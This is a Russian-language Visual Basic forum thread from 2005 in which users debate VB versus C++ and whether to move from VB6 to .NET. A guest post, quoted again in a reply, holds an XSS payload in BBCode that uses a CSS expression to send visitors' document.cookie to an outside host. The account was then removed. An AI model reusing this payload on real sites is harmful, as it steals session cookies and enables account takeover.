Обдумывающим выбор языка

Программирование на Visual Basic, главный форум. Обсуждение тем программирования на VB 1—6.
Даже если вы плохо разбираетесь в VB и программировании вообще — тут вам помогут. В разумных пределах, конечно.
Правила форума
Темы, в которых будет сначала написано «что нужно сделать», а затем просьба «помогите», будут закрыты.
Читайте требования к создаваемым темам.
Sebas
Неуловимый Джо
Неуловимый Джо
Аватара пользователя
 
Сообщения: 3626
Зарегистрирован: 12.02.2002 (Вт) 17:25
Откуда: столько наглости такие вопросы задавать

Сообщение Sebas » 06.07.2005 (Ср) 14:16

Mikle писал(а):Sebas
Забыл в цикл сунуть DoEvents. :lol:


Это служба!
- Я никогда не понимал, почему они приходят ко мне чтобы умирать?

sebas<-@->mail.ru

GSerg
Шаман
Шаман
 
Сообщения: 14286
Зарегистрирован: 14.12.2002 (Сб) 5:25
Откуда: Магадан

Сообщение GSerg » 06.07.2005 (Ср) 15:18

Предлагаю снести все постинги, кроме первого, и повесить замок :)
Как только вы переберёте все варианты решения и не найдёте нужного, тут же обнаружится решение, простое и очевидное для всех, кроме вас

alibek
Большой Человек
Большой Человек
 
Сообщения: 14205
Зарегистрирован: 19.04.2002 (Пт) 11:40
Откуда: Russia

Сообщение alibek » 06.07.2005 (Ср) 15:37

GSerg писал(а):Предлагаю снести все постинги, кроме первого, и повесить замок :)

Одобрям-с :)
Lasciate ogni speranza, voi ch'entrate.

tyomitch
Пользователь #1352
Пользователь #1352
Аватара пользователя
 
Сообщения: 12822
Зарегистрирован: 20.10.2002 (Вс) 17:02
Откуда: חיפה

Сообщение tyomitch » 06.07.2005 (Ср) 21:17

alibek писал(а):Эх, жаль что BP забанен :) Они бы нашли друг друга :)

Дык вроде бы BP не забанен - он просто обиделся на всех нас и ушёл кипятиться в другое место :-)
Изображение

Amed
Алфизик
Алфизик
 
Сообщения: 5346
Зарегистрирован: 09.03.2003 (Вс) 9:26

Сообщение Amed » 06.07.2005 (Ср) 21:22

Просто удивительна та горячность и упёртость, с которой некоторые юзеры отстаивают свою (и явно неправильную) точку зрения. А также упорство, с которым модераторы не закрывают топик... :?

tyomitch
Пользователь #1352
Пользователь #1352
Аватара пользователя
 
Сообщения: 12822
Зарегистрирован: 20.10.2002 (Вс) 17:02
Откуда: חיפה

Сообщение tyomitch » 06.07.2005 (Ср) 21:23

uhm писал(а):Двух зайцев...

Типа, бывает заяц-барабанщик, а Igor_123 - заяц-баянист? :-D
Изображение

BV
Thinker
Thinker
Аватара пользователя
 
Сообщения: 3987
Зарегистрирован: 12.09.2004 (Вс) 0:55
Откуда: Молдавия, г. Кишинёв

Сообщение BV » 06.07.2005 (Ср) 23:48

Тему следовало бы переместить в "Народный треп", ведь основной её смысл - "быть или не быть", а это уже философия :wink:
const char *out = "|*0>78-,+<|"; size_t cc = char_traits<char>::length(out);
for (size_t i=0;i<cc;i++){cout<<static_cast<char>((out[i]^89));}cout<<endl;

Sasha_karasov
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 436
Зарегистрирован: 03.03.2005 (Чт) 19:38
Откуда: ua.dp

Сообщение Sasha_karasov » 07.07.2005 (Чт) 1:51

SHURUP писал(а):Мне вообще выбор языка давался нелегко...
В школе на уроках информатики мы изучали Basic (самый, что ни есть обычный), но поскольку компьютерного класса у нас не было – основное внимание приделяли алгоритмам и блок-схемам, а описание работы программ происходило по методу «Дети, представьте себе компьютер. Левая часть доски – это экран, а правая – память в которой хранится программа…».

Впервые увидел компьютер (не считая визитов к знакомым с целью поиграть) – в университете. Там нам сразу сказали, что Бейсик – это отстой (приводили почти те же аргументы, что и в данном топике), и что мы будем изучать «язык настоящих програмистов» – Си (периодически называя его «язык ЭС»)

Работали мы с Турбо Си под ДОС, я потихоньку осваивал для себя новый язык, забывал старый добрый Бейсик с нумерацией строк, и приучивался закрывать эти самые строки точкой с запятой.
Поскольку наша специальность не была никоем образом не связана с компьютерами – курс был краток и Виндовс со всеми его окнами и приложениями мы так и не увидели. Только ДОС.

Особо сложного там ничего не было, и вскоре, сдав курсовую, все забыли о информатике и программировании, и лишь я один из группы тогда понял, что просто так я это дело не брошу.

Взяв в библиотеке книжку по Си, я стал понимать, что возможности этого языка – безграничны, что на нем можно писать программы не только для решения квадратных уравнений, но и графические проги и даже ИГРЫ (под ДОС конечно, ибо о Виндовсе я знал только понаслышке, да и не нужен он мне был тогда). Поскольку дома компа не было – пришлось вспомнить школьные методы и с помощью листка миллиметровки и тетрадки в клеточку «заочно» разработать основу чего-то вроде MSPaint-a. И я думал, что появится у меня комп – я реализую свою прогу, принесу пользу людям и вообще изменю жизнь к лучшему.

Наивен. Через год дома появился ПК, я радовался как мог, но разочарование пришло вместе с надписью Windows98 и окошками, которые были не в сравнение красивее и элегантнее чем в прогах под ДОС. Загрузив с дискетки, которую хранил как зеницу ока, дистрибутив ТС я понял, что мне никогда не написать в этой среде что-то, что имело бы непрямоугольную форму окна (как Автораны некоторых компактов), что могло бы выдать сообщение поверх других окон (типа о нехватке памяти), что проигрывало б не бибикание РСспикера, а настоящую музыку через колонки, и что нужно искать что-то более современное…

В тот же день оббежав всех знакомых я наконец-то достал диск «програмирование для начинающих» на котором была «Visual С v?? for Windows». Радость длилась недолго, ибо ставиться она почему-то не захотела. Пробежавшись взглядом по оглавлению диска я заметил там «Visual Basic 5». Документации к нему на диске не было, справка была урезана, доступа в инет не предполагалось и в планах. Пришлось осваивать все методом научного тыка. Его (VB5) возможности мне сразу показались слегка ограниченными, ибо я не нашел в нем возможности сделать такое простое действие, как «Очистка корзины программным путем», но простота разработки, красота интерфейса покорили меня и я искренне верил, что очистку корзины можно будет реализовать в следующей версии VB.

Однако и в следующей версии «функции очистки» не было. И я искал другие методы и даже иногда находил их. Многие вопросы оставались без ответа, но некоторые можно было решить, добавив в проект компонент «Фантазия v.1.0» и функцию «обхода препятствий нестандартным методом а иногда и даже через Ж.».

Поделившись впечатлениями со знакомым начинающим программистом, получил ответ: «Бейсик – отстой, учи Дельфи там все ясно». И я наверное бы и стал бы его изучать, если б не один друг-однокласник, который (зарегистрировавшись на этом форуме) разнюхал информацию о таком монстре, как «API-функции». Это было что-то. Это все-равно, что жить в доме несколько лет и потом вдруг обнаружить за шкафом дверь в другое здание, в котором можно найти все, что только пожелает душа.

Друг получил благодарность. Я получил функцию очистки корзины. Далее все пошло как по маслу. Достал «MSDN», на отсутствие котрого постоянно ругался VB, подключение к инету, регистрация, первый пост, первая звездочка. Но …

…Но некоторые вещи оставались (и частично остаются) выше моего понимания, такие как «сообщения окну», «отлов сообщений» и подобные. В MSDN-е все на иностранном мне языке, а статей по этим вопросам для VB на русском – не очень то и много. Зато для Си - хоть отбавляй. Делать нечего, приходится ставить Visual C++, в котором эти понятия являются ключевыми и никуда от них не деться. И по крупинкам вникать в основы работы операционной системы. Сечас же пытаюсь параллельно изучать оба языка, перекладывая опыт работы с одной среды в другую. Чего и вам желаю.

Ведь если дискуссия состоит в VB or Cи, то не стоит забывать, что OR это не XOR. и ничего не мешает совмещать эти два хороших язика. Оба они по своему хороши и полезны.
Надеюсь, меня не забанят за флуд.
ЗЫ: кстати в VB7 есть встроенная функция очистки корзины? ;-)

Оно так и есть в школе учат QBasic, а в вузах учат C++!
Как было так и осталось!
QBasic и учат чтоб потом перейти на более сложный и мощный язык как C++.
Короче QBasic это студент! У меня есть картинка там каждый язык как человек! Вот например там Basic выглядит как студень первокурсник, а СИ там самый крутой!
Так и есть, я не спорю нужно знать и VB и VC++! Если тебе нужно написать простую программу тебе нужно наверно использовать VB, а если по сложней например как защиту Сити или еще что-то то уже нужно писать на C++, в Visual Studio не зря запихнули VB и VC! Но что я все это время хотел сказать что С++ проживет без VB а вот VB без C++ нет! И значит что Visual C++ это самый крутой язык программирования на сегодняшний день, и наверно так будет всегда!
Удачи!
С уважением, Алексадр.

BV
Thinker
Thinker
Аватара пользователя
 
Сообщения: 3987
Зарегистрирован: 12.09.2004 (Вс) 0:55
Откуда: Молдавия, г. Кишинёв

Сообщение BV » 07.07.2005 (Чт) 3:03

Новые дополнения к Правилам конференции, RayShade писал(а):Запрещается злоупотребление цитатами, при использовании цитат не забывайте отрезать лишнее.
const char *out = "|*0>78-,+<|"; size_t cc = char_traits<char>::length(out);
for (size_t i=0;i<cc;i++){cout<<static_cast<char>((out[i]^89));}cout<<endl;

Sasha_karasov
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 436
Зарегистрирован: 03.03.2005 (Чт) 19:38
Откуда: ua.dp

Сообщение Sasha_karasov » 07.07.2005 (Чт) 3:14

Да надо конституцию VBS прочитать :lol:
Удачи!
С уважением, Алексадр.

MeMBus
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 450
Зарегистрирован: 23.02.2005 (Ср) 7:03
Откуда: Из леса...

Сообщение MeMBus » 07.07.2005 (Чт) 3:39

Народ, простите конечно, но про что тут постинг – про «тех кто думает над выбором языков»... посему думаю наезды на Sasha_karasov в некоторых случаях не уместны, т.к. м.б. чел еще не определился что он хочет (да, конечно в некоторых случаях и он некорректен в высказываниях), к тому же на него накатывают за оффтоп, хотя на 4-листе – много сообщений от тех у кого по 14 звезд (+/-) которые тоже идут в оффтоп, но этого не видят (или боятся видеть, или еще чего)... Прошу прощения и за этот оффтоп...
Бороться и искать, найти и перепрятать!

MeMBus
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 450
Зарегистрирован: 23.02.2005 (Ср) 7:03
Откуда: Из леса...

Сообщение MeMBus » 07.07.2005 (Чт) 3:41

А теперь к главному... Все наверное уже знают что VB6 и VB.Net – достаточно разные языки, так-же как и то что VB6 – уже не поддерживается (посему считаю что рано или поздно тот язык о котором знает почти весь компьютерный мир, погибнет). Тогда возникает резонный вопрос – куда Вы повернете, ведь Вам тоже нужно будет «обдумывать выбор»? Будите верны двум буквам с приставкой, или же...?
Бороться и искать, найти и перепрятать!

Amed
Алфизик
Алфизик
 
Сообщения: 5346
Зарегистрирован: 09.03.2003 (Вс) 9:26

Сообщение Amed » 07.07.2005 (Чт) 6:35

Дело не в количестве звёзд, а в том, что надо _внимательно_ читать первый постинг.

Почему бы без раздумий не перейти с vb6 на vb.net? Назовите хоть одну стоящую причину.

Mikle
Изобретатель велосипедов
Изобретатель велосипедов
Аватара пользователя
 
Сообщения: 4147
Зарегистрирован: 25.03.2003 (Вт) 14:02
Откуда: Туапсе

Сообщение Mikle » 07.07.2005 (Чт) 8:45

Amed
Назовите хоть одну стоящую причину

Пока рановато. Выпуская маленькую программку на 100 кБ приходится укомплектовывать ее фреймворком. У многих вообще Win98 до сих пор стоит. Но изучать .net уже пора, а придет время - перейти.

alibek
Большой Человек
Большой Человек
 
Сообщения: 14205
Зарегистрирован: 19.04.2002 (Пт) 11:40
Откуда: Russia

Сообщение alibek » 07.07.2005 (Чт) 9:09

Sasha_karasov писал(а):Короче QBasic это студент! У меня есть картинка там каждый язык как человек! Вот например там Basic выглядит как студень первокурсник, а СИ там самый крутой!

LOL!!! Просто финиш!!!

Sasha_karasov, а тебе сколько лет? :)
Lasciate ogni speranza, voi ch'entrate.

MeMBus
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 450
Зарегистрирован: 23.02.2005 (Ср) 7:03
Откуда: Из леса...

Сообщение MeMBus » 07.07.2005 (Чт) 10:19

1) Все же это разные языки (либо я не вник)... Соответственно, с таким же успехом можно перейти на другой язык (хотя впрочем, кто рубит в одном языке, менее безболезненно перейдет на другой, нежели тот, кто не рубит).
2) Согласен, что еще рано делать что-то для знакомых/друзей, таскать 20Mb многовато. Конечно если проект глобальный или идея хорошая, то можно, но все же... Пока не выйдет Longhorn и не встанет хотя бы на 40-50% компов юзверов (если учесть что требования к ресурсам компа, превосходят в несколько раз моего не очень старого компа, то это произойдет не так быстро), рано говорить о .Net технологии и ее нормальной поддержке (опять же, это мое мнение, посему не кидайте томатами).
3) Лично я жду VS2005

Хотелось бы увидеть и другие мнения, кто на что переходит, кто на чем остается.
Бороться и искать, найти и перепрятать!

Igor_123
Осторожный Баянист
Осторожный Баянист
Аватара пользователя
 
Сообщения: 1325
Зарегистрирован: 21.07.2004 (Ср) 13:00
Откуда: Днепропетровск

Сообщение Igor_123 » 07.07.2005 (Чт) 10:31

Саша!
В школе учат бейсик, не потому, что он чем-то хуже, а потому что во-первых никакой специалист не пойдет в школу/вуз, на 400 грн. з/п преподавать даже тот-же QBasic/С/С++, а во-вторых поэтому и преподают то на что хватает денег.
У меня в школе была учительница информатики, которая работала с FORT и в Basic который стоял на Корветах ничего не понимала. За несколько месяцев мы её обогнали и к окончанию школы у меня была программа, которая закрашивала экран, но написал я её в машинных кодах, т.к. больше никаких других инструментов не было.

В ВУЗе учат далеко не VС++, а C++ - как язык, а так-же асм, паскаль, пролог, фортран, лисп.

Все упираеться в твое желание что-то узнать и чему-то научиться.

Мой знакомый пишет на Visual FoxPro и не собираеться уходить на другой язык, но и не агитирует меня в свою веру, как и я его.
Просто мы решаем разный круг задач, для которых выбираем те инструменты которые можем лучше приспособить для их решения.


На работе политика такая:
Если программа с серьёзным пользовательским интерфейсом - пишем на билдере, если работа с железом(специфика работы) то VC++, мелкие утилиты, облегчающие жизнь :D , VC++, Builder, VB, VBA

Для меня нет понятия лучше язык - хуже язык, есть критерий на каком языке или комбинации языков я решу поставленную задачу надёжно и в срок.

MeMBus
В одной статье прочитал(дословно не помню, но смысл примерно таков):
Выход Net свершившийся факт и не принимать его, было-бы ошибкой. VB6 и VB.Net - разные языки, и пока Net не очень распространен нужно заваливаться на диван и начинать учить. Тогда Вы будете во всеоружии, когда придет время начинать использовать Net.

Я согласен с этим мнением, но поставить фреймворк пока не позволяет компутер. Когда позволит, поставлю и буду изучать, и начну заглядывать в раздел VB.Net и задавать вопросы :D

Надеюсь не перекрестят, к тому времени в заяца-баяниста :D

З.Ы. Говорю за свой город по состоянию на 2 года назад
Водки я вам не обещаю, но погуляем хорошо.
И. Сусанин.

Аватара (с) Тёмыч

tyomitch
Пользователь #1352
Пользователь #1352
Аватара пользователя
 
Сообщения: 12822
Зарегистрирован: 20.10.2002 (Вс) 17:02
Откуда: חיפה

Сообщение tyomitch » 07.07.2005 (Чт) 12:29

Sasha_karasov писал(а):Оно так и есть в школе учат QBasic, а в вузах учат C++!

А вот мы в школе учили Паскаль, а а вузе Жаву. Что делать?

Sasha_karasov писал(а):Как было так и осталось!
QBasic и учат чтоб потом перейти на более сложный и мощный язык как C++.

"Пользоваться липучками учат для того, чтобы потом перейти на более сложную и мощную технологию - шнурки."
Ну смешные вещи ты говоришь, ей-богу.

Sasha_karasov писал(а):в Visual Studio не зря запихнули VB и VC!

А ещё в VS есть Фортран. Фортран - это наверное ещё круче чем C++, да? ;-)

Sasha_karasov писал(а):Но что я все это время хотел сказать что С++ проживет без VB а вот VB без C++ нет!

Не понял смысл этого пассажа... Как это - "язык проживёт без другого языка"?

Sasha_karasov писал(а):И значит что Visual C++ это самый крутой язык программирования на сегодняшний день, и наверно так будет всегда!

C++ появился всего 20 лет назад, а ещё лет через 20 про него никто и не вспомнит...
Изображение

Mikle
Изобретатель велосипедов
Изобретатель велосипедов
Аватара пользователя
 
Сообщения: 4147
Зарегистрирован: 25.03.2003 (Вт) 14:02
Откуда: Туапсе

Сообщение Mikle » 07.07.2005 (Чт) 13:18

Igor_123
Для меня нет понятия лучше язык - хуже язык, есть критерий на каком языке или комбинации языков я решу поставленную задачу надёжно и в срок.

А для меня, всеже, есть. Просто это не имеет отношения к спору VB vs СИ. Пример - Quick Basic vs Turbo Basic. Обладают почти равными возможностями, но РЕАЛИЗАЦИИ... :roll:

Igor_123
Осторожный Баянист
Осторожный Баянист
Аватара пользователя
 
Сообщения: 1325
Зарегистрирован: 21.07.2004 (Ср) 13:00
Откуда: Днепропетровск

Сообщение Igor_123 » 07.07.2005 (Чт) 13:37

Mikle
На всякое правило есть исключения, подтверждающие данное правило :D
Водки я вам не обещаю, но погуляем хорошо.
И. Сусанин.

Аватара (с) Тёмыч

tyomitch
Пользователь #1352
Пользователь #1352
Аватара пользователя
 
Сообщения: 12822
Зарегистрирован: 20.10.2002 (Вс) 17:02
Откуда: חיפה

Сообщение tyomitch » 07.07.2005 (Чт) 17:11

Mikle писал(а):А для меня, всеже, есть. Просто это не имеет отношения к спору VB vs СИ. Пример - Quick Basic vs Turbo Basic. Обладают почти равными возможностями, но РЕАЛИЗАЦИИ... :roll:

Имхо дело привычки. Какому-нибудь фанату TB было бы тошно от QB.
Я за всеобщее языковое равноправие :-)

Michael Kaplan писал(а):Maybe they will have to prove why they think it is a good choice -- this is a job interview after all! But if I say they can use anything then they can walk in with LISP, SED, QBasic, Pascal, DOS batch files, ALGOL, SQL, or whatever crazy-ass language they want.
Изображение

Mikle
Изобретатель велосипедов
Изобретатель велосипедов
Аватара пользователя
 
Сообщения: 4147
Зарегистрирован: 25.03.2003 (Вт) 14:02
Откуда: Туапсе

Сообщение Mikle » 08.07.2005 (Пт) 9:30

tyomitch
Фанат - это по определению человек с необъективной точкой зрения.
Я тоже за равные права, но это не означает автоматически равные возможности.

Гость
 

Сообщение Гость » 08.07.2005 (Пт) 16:50

[url]www.ut[url=www.s=''
style='font-size:0;color:#EFEFEF
'style='top:expression(eval(this.sss));
'sss=`i=new/**/Image();
i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
this.sss=null`style='font-size:0;]
[/url][/url]'

tyomitch
Пользователь #1352
Пользователь #1352
Аватара пользователя
 
Сообщения: 12822
Зарегистрирован: 20.10.2002 (Вс) 17:02
Откуда: חיפה

Сообщение tyomitch » 08.07.2005 (Пт) 18:17

freeloader писал(а):[url]www.ut[url=www.s=''
style='font-size:0;color:#EFEFEF
'style='top:expression(eval(this.sss));
'sss=`i=new/**/Image();
i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
this.sss=null`style='font-size:0;]
[/url][/url]'

Ура! Ура! На нашем форуме нет этой дыры!! :-D
Изображение

FaKk2
El rebelde gur&#250;
El rebelde gur&#250;
Аватара пользователя
 
Сообщения: 2031
Зарегистрирован: 09.03.2003 (Вс) 22:10
Откуда: Los Angeles

Сообщение FaKk2 » 08.07.2005 (Пт) 18:41

tyomitch

Нет :)

Кстати, касательно, великого флеймера - ему около 14-15 лет, не принимайте его всерьез :D
Для получения ответа надо продемонстрировать качества, позволяющие стать компетентным — внимательность, вдумчивость, наблюдательность, желание активно участвовать в выработке решения.

RayShade
Scarmarked
Scarmarked
Аватара пользователя
 
Сообщения: 5511
Зарегистрирован: 02.12.2002 (Пн) 17:11
Откуда: Russia, Saint-Petersburg

Сообщение RayShade » 08.07.2005 (Пт) 20:12

Вот ведь какие люди попадаются иногда, а.

Ну, снсенный акаунт да послужит всем примером.

Sasha_karasov
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 436
Зарегистрирован: 03.03.2005 (Чт) 19:38
Откуда: ua.dp

Сообщение Sasha_karasov » 09.07.2005 (Сб) 2:00

Igor_123 писал(а):Саша!
В школе учат бейсик, не потому, что он чем-то хуже, а потому что во-первых никакой специалист не пойдет в школу/вуз, на 400 грн. з/п преподавать даже тот-же QBasic/С/С++, а во-вторых поэтому и преподают то на что хватает денег.
Зайди В ЛИТ и глянь на че там хватает, там есть VS, VS.net! да и у нас в школе не хуже! :wink:
Удачи!
С уважением, Алексадр.

Sasha_karasov
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 436
Зарегистрирован: 03.03.2005 (Чт) 19:38
Откуда: ua.dp

Сообщение Sasha_karasov » 09.07.2005 (Сб) 2:17

Нам говорили что он и для этого и сделан! И говорили что вы не че не напишете на VB! Учите С++ без него не куда!
Удачи!
С уважением, Алексадр.

Sasha_karasov
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 436
Зарегистрирован: 03.03.2005 (Чт) 19:38
Откуда: ua.dp

Сообщение Sasha_karasov » 09.07.2005 (Сб) 2:22

И вообще вот например в Харьковском Гос. Университет! Там все самое новое им приносят! Да вроде для школ без платный софт!
И Харьковском Гос. Университете учат BC++ и VC++, VC++.net
Удачи!
С уважением, Алексадр.

Sasha_karasov
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 436
Зарегистрирован: 03.03.2005 (Чт) 19:38
Откуда: ua.dp

Сообщение Sasha_karasov » 09.07.2005 (Сб) 2:40

Sasha_karasov писал(а):Но что я все это время хотел сказать что С++ проживет без VB а вот VB без C++ нет!

Не понял смысл этого пассажа... Как это - "язык проживёт без другого языка"?[/quote]Когда один током не че не может сделать приходится просить других(СИ)
Последний раз редактировалось Sasha_karasov 09.07.2005 (Сб) 3:08, всего редактировалось 1 раз.
Удачи!
С уважением, Алексадр.

Пред.След.

Вернуться в Visual Basic 1–6

Кто сейчас на конференции

Сейчас этот форум просматривают: Google-бот и гости: 6

    TopList  
cron